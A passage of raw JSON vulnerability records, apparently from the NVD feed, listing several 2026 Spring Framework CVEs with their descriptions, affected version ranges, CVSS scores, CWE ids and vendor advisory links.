through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N","baseScore":4.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.2,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:39:36.187494Z","id":"CVE-2026-41838","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-330"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41838","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41841","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.087","lastModified":"2026-07-17T20:16:25.520","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring MVC and WebFlux applications are vulnerable to Information Disclosure attacks when resolving static resources.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:31:40.600918Z","id":"CVE-2026-41841","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-524"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41841","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41842","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.203","lastModified":"2026-07-17T20:16:38.177","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring MVC and WebFlux applications are vulnerable to Denial of Service (DoS) attacks when resolving static resources.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:32:03.941876Z","id":"CVE-2026-41842","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41842","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41843","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.320","lastModified":"2026-07-17T20:17:20.810","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring MVC and WebFlux applications are vulnerable to Path Traversal attacks when resolving static resources.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:32:26.703629Z","id":"CVE-2026-41843","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41843","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41844","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.440","lastModified":"2026-07-17T20:19:45.727","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A Spring MVC or Spring WebFlux application which configures a mapping for \"/**\" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":4.2,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:31:22.517177Z","id":"CVE-2026-41844","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41844","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41845","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.557","lastModified":"2026-07-17T20:20:27.870","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Due to incorrect escaping, the use of JavaScriptUtils.javaScriptEscape() may lead to JavaScript code injection in the browser, potentially resulting in a cross-site scripting (XSS) vulnerability.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:33:16.137910Z","id":"CVE-2026-41845","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41845","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41846","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.693","lastModified":"2026-07-17T20:20:45.257","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring MVC applications which accept user-supplied values in the cssClass, cssErrorClass, or cssStyle attributes of JSP form tags allow arbitrary HTML/JavaScript code injection, potentially resulting in a cross-site scripting (XSS) vulnerability.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:33:32.578842Z","id":"CVE-2026-41846","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41846","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41848","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:36.940","lastModified":"2026-07-17T20:21:31.147","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Applications may be vulnerable to a Regular Expression Denial of Service (ReDoS) attack if an attacker is able to provide a pattern which is then directly or indirectly supplied to one of the following methods in AntPathMatcher: match(String pattern, String path), matchStart(String pattern, String path), extractUriTemplateVariables(String pattern, String path).\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.2,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:34:06.523315Z","id":"CVE-2026-41848","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-1333"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41848","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41850","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:37.177","lastModified":"2026-07-17T20:21:50.090","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Applications that evaluate user-supplied Spring Expression Language (SpEL) expressions are vulnerable to an Algorithmic Denial of Service (DoS). By providing a specially crafted expression, an attacker can trigger excessive resource consumption during evaluation, leading to application degradation or unavailability.\n\nAffected versions:\nSpring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Framework","defaultStatus":"unaffected","versions":[{"version":"7.0.0","lessThan":"7.0.7.1","versionType":"custom","status":"affected"},{"version":"6.2.0","lessThan":"6.2.18.1","versionType":"custom","status":"affected"},{"version":"6.1.0","lessThan":"6.1.28","versionType":"custom","status":"affected"},{"version":"5.3.0","lessThan":"5.3.49","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-09T13:34:30.887287Z","id":"CVE-2026-41850","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-407"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"5.3.0","versionEndExcluding":"5.3.49","matchCriteriaId":"9394F974-169E-4FB0-A85B-0114477DE421"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1.0","versionEndExcluding":"6.1.28","matchCriteriaId":"CE392CE7-5DA3-4DBE-B22C-27781E204B7E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2.0","versionEndExcluding":"6.2.18.1","matchCriteriaId":"8D4BC30C-3E08-4A62-992D-4D2274844D54"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*","versionStartIncluding":"7.0.0","versionEndExcluding":"7.0.7.1","matchCriteriaId":"569A2EF8-281F-4D8A-A76C-79ED67826B38"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41850","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41851","sourceIdentifier":"security@vmware.com","published":"2026-06-09T05:16:37.297","lastModified":"2026-07-17T20:22:22.290","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Applications which accept user-supplied Spring Expression Language (SpEL) expressions may be vulnerable to a Denial of Service (DoS) attack if the evaluation of a SpEL expression triggers unbounded cache growth.\n\nAffected versions:\nSpring Framework 